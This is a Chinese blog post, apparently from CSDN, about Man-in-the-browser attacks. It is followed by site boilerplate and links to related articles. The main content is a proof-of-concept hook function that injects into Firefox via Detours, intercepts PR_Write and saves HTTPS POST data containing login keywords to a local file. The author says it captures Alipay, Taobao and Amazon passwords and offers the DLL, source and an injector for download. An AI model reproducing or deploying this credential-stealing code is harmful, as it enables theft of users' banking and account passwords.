浏览器数据包截获Man-in-the-browser

最新推荐文章于 2025-01-21 10:00:00 发布
原创 最新推荐文章于 2025-01-21 10:00:00 发布 · 4.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文探讨了Man-in-the-Browser攻击方式,介绍如何利用木马修改浏览器中的HTTPS数据,实现对用户敏感信息如银行交易金额和账号的篡改。同时提供了一个针对Firefox浏览器的POC程序案例。

Man-in-the-browser跟man-in-the-middle(中间人攻击)有点类似,浏览器(IE, firefox)被木马感染后,木马可以修改web页面,修改或者添加http(s)中的任何数据。而这个过程中用户和服务器都不知晓。去年玩过一个flash游戏,游戏成绩最后使用一个POST请求score=2000,通过https传送到服务器上。这时注入一段程序到浏览器中,在数据加密之前把成绩改了,就大功告成,得了一个不错的成绩。是想,如果是网银交易是否也存在同样的问题:交易金额被修改,交易账号被修改等等。


之前发了一篇文章支付宝是加密还是编码说支付宝使用固定密钥加密登陆密码,致使密文永远不变,不能抵御重放攻击。当zbot之类的木马出现的后,支付宝的密码就不安全了。zbot能抓取浏览器中的包括https在内的所有数据,窃取密码是zbot的一个重要功能。Zbot将自身注入到浏览器中,hook关键API:PR_Write, HttpSenRequest等,将抓取的感兴趣的数据传送给它的主人。

我针对Firefox做了一个简单的POC程序,根据关键字抓取用户名和密码。使用Detours完成hook,detours的使用很简便,安装包中有samples,不赘述。PR_Write函数原型Firefox官网上有,下面是hook函数,根据关键字保存下感兴趣的数据。经测试支付宝,淘宝,亚马逊密码都能截取。

int My_PR_Write(PVOID fd,const void *buf,int amount)
{
	try
	{
		if(amount>20 && isHttpPost( (char*)buf ) && KeywordFilter( (char*)buf) )
		{
			OutputDebugStringA("==================================\n");
			OutputDebugStringA((char*)buf);
			OutputDebugStringA("==================================\n\n");
			FILE* f = NULL;
			fopen_s(&f,"c:\\hijackhttp.txt","a");
			fwrite(buf,1,amount,f);
			fclose(f);
		}
	}
	catch(...)
	{
		Print("Bowl===Bowl===Bowl===");
	}
	return pfPR_Write(fd,buf,amount);
}


程序和代码下载:Man in the browser

HijackHttp.dll: 完成hook的dll。

dllmain.cpp 是源代码。

SetDll.exe 是detours自带的一个工具,修改PE文件的导入表来加载DLL.。

使用说明.txt 是使用方法的简单说明。



第十章 网络协议和管理配置 -- 网络配置(三)
Raymond的博客
02-02 411
本文介绍了Linux网络bonding(多网卡绑定)技术的配置与实现。主要内容包括: Bonding工作模式:详细说明三种常见模式: Mode 0(轮询策略)实现负载均衡和容错 Mode 1(主备策略)提供高可用性 Mode 3(广播策略)用于容错 配置方法:通过修改网络配置文件实现bonding,包括创建bond0主配置文件和eth0/eth1从属配置文件,并设置BONDING_OPTS参数(如mode=1和miimon检测间隔)。 管理与监控:通过/proc/net/bonding/bond0查看绑定状
社会工程学攻击案例-网站钓鱼
Goallegoal的博客
05-04 4259
社会工程学攻击案例-网站钓鱼 渗透攻击原理 攻击机与其他主机在同一局域网内,通过 ARP 欺骗使其他主机的流量都经过攻击机,有选择性的抓取数据包,例如攻击者想要窃取用户登录百度网站的信息,采取克隆站点的方式,来强制引导用户主机的流量。 该攻击方式需要执行以下三个步骤: 1、ARP 欺骗 2、域名劫持 3、网站克隆 BT5实现 1、启动社会工程学攻击集 root@bt:~# cd /pentes...
Man-In-The-Browser
04-12
截获FireFox中输入的用户名和密码,支付宝,淘宝,亚马逊,等一网打尽。本demo截获保护username关键字的数据包,所以其他网站登陆信息业可能被截获
IE浏览器抓包工具(挺好用)
06-19
可嵌入IE浏览器,截取Post 和 GET 的数据包
【python教程入门学习】浏览器实现抓包过程详解
每日分享程序员技巧
10-11 2530
几乎所有浏览器都提供了抓取数据包的功能,因为浏览器为抓包提供了一个专门的操作界面,因此这种抓包方式也被称为“控制台抓包”。本节以 Chrome 浏览器为例进行抓包演示。 控制台抓包指的是利用浏览器开的发者调试工具抓取客户端与后端服务器交互的数据,它能够将网络传输中发送与接收的数据进行截获、重发和编辑。 控制台抓包非常适合于 POST 请求类型。我们知道,POST 请求使用 Form 表单向服务器提交数据,通过抓包可以获取 POST 请求体的数据以及相应参数,从而对响应内容进行分析。下面以有道翻译为例,讲解如
Fiddler对数据包的拦截(打断点、设置断点)、改包、伪造(构造)、自动响应
LilGaage的博客
10-13 9560
一、应用 定位bug:界定bug是由前端产生的,还是后端产生的。可以是两种策略: 1,抓包--抓取请求或者响应的数据包 2,改包--修改请求或者响应的数据包 使用Fiddler抓包,查看前端发送的请求和后端返回的响应。如果请求有问题,那就是前端的bug;如果响应有问题,那就是后端的bug。 二、改包 方式:拦截、修改、放行 对象:请求、响应 流程: 对请求进行拦截(打断点、设置断点)-修改请求消息-放行请求...
2.Burp Suite 入门篇 —— HTTP 流量抓包
YouTheFreedom的博客
04-07 3745
本篇文章会教你怎么用 Burp Proxy 拦截 HTTP 请求,burpsuite 抓包的原理是通过 Burp Proxy 代理浏览器和目标服务器之间发送的 HTTP 请求和响应。通过 burpsuite 的抓包功能,我们既可以有针对性地拦截捕捉某些网络请求的流量,也能先正常访问网站,然后再去历史记录里面查看客户端和服务器之间的通讯过程和内容。
OpenFaux-client: 提升网络隐私与安全的开源浏览器插件
MITM攻击(Man-in-the-Middle Attack) 中间人攻击(MITM)是一种攻击方式,攻击者插入到通信双方的中间,拦截、修改或重放传输信息。在未加密的通信中,这是比较容易实现的。即使在加密通信中,如果攻击者能够剥...
day54-网络安全
旷增的博客
10-09 748
防火墙(Firewall) 防火墙作用 在计算机领域,防火墙是用于保护信息安全的设备,其会依照用户定义的规则,允许或限制数据的传输。 用于保护内网安全的一种设备 依据规则进行防护 用户定义规则 允许或拒绝外部用户访问 防火墙分类 逻辑上划分,防火墙可以大体分为主机防火墙和网络防火墙\ 主机防火墙:针对于单个主机进行防护\ 网络防火墙:针对网络进行防护,处于网络边缘,防火墙背后是本地局域网\ 网络防火墙主外(服务集体),主机防火墙主内(服务个人) 物理上划分,防火墙可分为硬件防火墙和软件防火墙
浏览器抓包F12解读——如何查看和分析
最新发布
weixin_65113709的博客
01-21 2192
给大家介绍一下各个组件的用途,便于理解框架。
教你用Fiddler修改HTTP请求和响应的数据包
luckyman98的博客
01-21 4247
Fiddler介绍 Fiddler是一个http协议调试代理工具,它能够记录并检查所有你的电脑和互联网之间的http通讯,设置断点,查看所有的“进出”Fiddler的数据(指cookie,html,js,css等文件)。 Fiddler 要比其他的网络调试器要更加简单,因为它不仅仅暴露http通讯还提供了一个用户友好的格式。 0. 下载安装Fiddler 1. 打开Fiddler设置代理 Tool...
browser抓包流程
adairfly的专栏
11-01 642
1.安装tcpdump到手机的/system/bin目录 adb push tcpdump /system/bin 2.给tcpdump添加可执行权限 adb shell cd /system/bin chmod 777 exit 3.抓取网络数据包,执行如下命令,/data/capture.pcap为生成的数据文件,可自行定义目录和文件名 adb shell tcpdump -
鼻祖Qbot银行木马攻击金融机构 导致AD活动目录用户账户大量锁定 能对抗杀软和分析...
weixin_33743248的博客
09-01 955
ibm 安全研究人员警告称,最近恶意软件引发的活动目录 (ad) 锁定影响了许多组织, 这似乎是 Qbot 银行恶意软件造成的。成百上千的 ad 用户在快速连续的情况下被锁在公司的域之外, 从而阻止受影响的组织的员工访问他们的端点、公司服务器和网络资产。 Qbot在2009年首次发现,由于长时间的不活动, Qbot 继续被放在最活跃的恶意软件家族的...
浏览器利用框架BeEF测试
★慕名斋★
11-07 2692
0×00 前言 http://www.vuln.cn/6966 BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。 目前对其测试的文章不是很多,所以希望通过本次测试给大家带来全新的认识。 0×01 简介 工具主页:http://beefproject.com
深入剖析在意大利肆掠的Danabot木马新变种
mozhe_的博客
12-24 528
尽管Proofpoint和Eset等安全公司早在今年5月份就曾针对在澳大利亚传播的Danabot样本进行了全面的分析,但就在过去的几周里,一个新的Danabot变种再次袭击了意大利。在这篇文章中,Cybaze-Yoroi ZLab将对最近通过以“fattura(发票)”为主题的网络钓鱼电子邮件(例如,N051118)在意大利传播的Danabot变种之一进行剖析。值得注意的是,这个变种滥用了包含嵌入...
Man-in-the-middle attack
雜貨鋪
03-05 2408
原文地址:https://en.wikipedia.org/wiki/Man-in-the-middle_attack   Man-in-the-middle attack From Wikipedia, the free encyclopedia Jump to: navigation, search Not to be confused with Meet-
火狐-firefox浏览器查看post请求、get请求及修改修改数据包id参数步骤
热门推荐
可可的博客
11-24 1万+
firefox浏览器查看post请求及form参数 一、打开firefox浏览器,打开开发者工具 按住F12或者单击右边的菜单栏选择更多工具中的开发者选项 二、打开有form表单的网页,点击网络当点击请求页面时,就会看到是是post请求还是get请求啦 三、点击post请求或get请求,右击重发->编辑并重发->找到下面的请求主体->修改id值然点击发送->最后在左边看到新出现的深颜色的请求,双击就好啦 以我们的作业要求为例子把id值改为1 order by 1# ...
Fiddler截包后代理转发
xuechangchun007的专栏
09-06 1434
Fiddler截包后再走代理请求及其他常见问题
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值